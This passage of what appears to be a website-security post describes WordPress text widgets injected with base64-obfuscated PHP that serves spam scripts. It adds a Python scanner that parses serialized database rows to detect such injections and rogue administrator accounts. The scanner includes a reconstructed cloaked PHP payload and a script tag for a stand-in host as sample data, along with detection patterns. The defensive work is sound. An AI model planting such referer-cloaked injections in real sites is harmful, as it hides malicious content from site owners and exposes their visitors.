That redirects to this free JS script hosting website:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

which injects spammy iframes inside the widget.

If you think that you are a victim of such an attack, check your database for the base64-encoded strings above, update all of your plugins, and check all of your widgets for suspicious activity. You can trust our Security Engineers at https://sucuri.net to check your website for more malicious code if you are unsure that the infection was cleared.
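Widget instances live in wp_options as PHP-serialized arrays, which is why the injection above appears as s:515:"<?php$r=... inside a text field. Checking the database properly means reading that format rather than grepping, so the following is an added example for this post (not Sucuri's or WordPress's code) with a minimal PHP unserialize() reader. It walks every text-widget instance, flags the indicators seen here (a PHP open tag in widget text, base64_decode, $_SERVER access, current_user_can gating) and decodes the base64 literals so the analyst sees HTTP_REFERER and SERVER_NAME in clear. The same reader answers the bogus-admin question from the login-bypass post above, since wp_capabilities is stored the same way. The widget option and usermeta rows are constructed; the third base64 string is a placeholder script tag because the one on the page is truncated, and shortener.example is an assumed hostname.

```python
import base64
import re
from typing import Any, Dict, List, Tuple


def php_unserialize(data: str) -> Any:
    """Minimal reader for PHP serialize() output: N, b, i, d, s and a (arrays become dicts).
    Strings are length-prefixed in bytes, so parsing happens on the UTF-8 bytes."""
    value, _ = _parse(data.encode("utf-8"), 0)
    return value


def _parse(buf: bytes, pos: int) -> Tuple[Any, int]:
    t = chr(buf[pos])
    if t == "N":
        return None, pos + 2                                   # N;
    if t in "bid":
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode()
        value = (raw == "1") if t == "b" else int(raw) if t == "i" else float(raw)
        return value, end + 1
    if t == "s":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                                      # skip :"
        return buf[start:start + length].decode("utf-8", "replace"), start + length + 2  # skip ";
    if t == "a":
        colon = buf.index(b":", pos + 2)
        count, pos, out = int(buf[pos + 2:colon]), colon + 2, {}   # skip :{
        for _ in range(count):
            key, pos = _parse(buf, pos)
            out[key], pos = _parse(buf, pos)
        return out, pos + 1                                    # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")


def php_serialize(v: Any) -> str:
    """Inverse of the reader; used here only to build the constructed sample."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode("utf-8"))}:"{v}";'
    if isinstance(v, dict):
        return f"a:{len(v)}:{{" + "".join(php_serialize(k) + php_serialize(x) for k, x in v.items()) + "}"
    raise TypeError(type(v))


SUSPECT = re.compile(r'<\?(?:php)?|base64_decode|eval\s*\(|gzinflate|str_rot13|current_user_can\s*\(|\$_SERVER\s*\[', re.I)
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def scan_widget_option(serialized: str) -> List[Dict]:
    """Inspect every instance in a widget option (e.g. wp_options.option_name = 'widget_text')."""
    findings = []
    for idx, inst in php_unserialize(serialized).items():
        if not isinstance(inst, dict):
            continue                                           # e.g. the _multiwidget marker
        text = str(inst.get("text", ""))
        hits = sorted({m.group(0).lower() for m in SUSPECT.finditer(text)})
        if hits:
            decoded = []
            for literal in B64_LITERAL.findall(text):
                try:
                    decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
                except (ValueError, UnicodeDecodeError):
                    decoded.append("<undecodable>")
            findings.append({"widget": idx, "hits": hits, "decoded": decoded})
    return findings


def find_admins(usermeta_rows: List[Tuple[int, str]]) -> List[int]:
    """(user_id, wp_capabilities) pairs -> ids holding the administrator capability;
    compare against the accounts you know you created."""
    return sorted(uid for uid, caps in usermeta_rows if php_unserialize(caps).get("administrator"))


# Constructed samples. The two short base64 strings are the ones from the post; the third is a placeholder.
SCRIPT_B64 = base64.b64encode(b'<script src="http://shortener.example/xyz"></script>').decode()
INJECTED_TEXT = ("<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; "
                 "$h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; "
                 f"$s=base64_decode('{SCRIPT_B64}'); $p = strpos($r, $h); "
                 "if(($p===false)&&($r<>'')){echo $s;}"
                 "if(current_user_can('administrator') || current_user_can('editor')) {?>")
SAMPLE_WIDGET_OPTION = php_serialize({
    2: {"title": "Sidebar", "text": "<p>Opening hours: 9-5</p>", "filter": True},
    6: {"title": "", "text": INJECTED_TEXT, "filter": True},
    "_multiwidget": 1,
})
SAMPLE_USERMETA = [(1, 'a:1:{s:13:"administrator";b:1;}'),
                   (7, 'a:1:{s:6:"editor";b:1;}'),
                   (42, 'a:1:{s:13:"administrator";b:1;}')]

if __name__ == "__main__":
    print(scan_widget_option(SAMPLE_WIDGET_OPTION))
    print("administrators:", find_admins(SAMPLE_USERMETA))
```

Decoding the referer/server-name pair is what exposes the logic: the injected script only echoes the tag for visitors arriving from elsewhere and suppresses it for logged-in staff, which is why the site owner never saw it. The same parse-then-inspect approach works for any serialized option, not only text widgets.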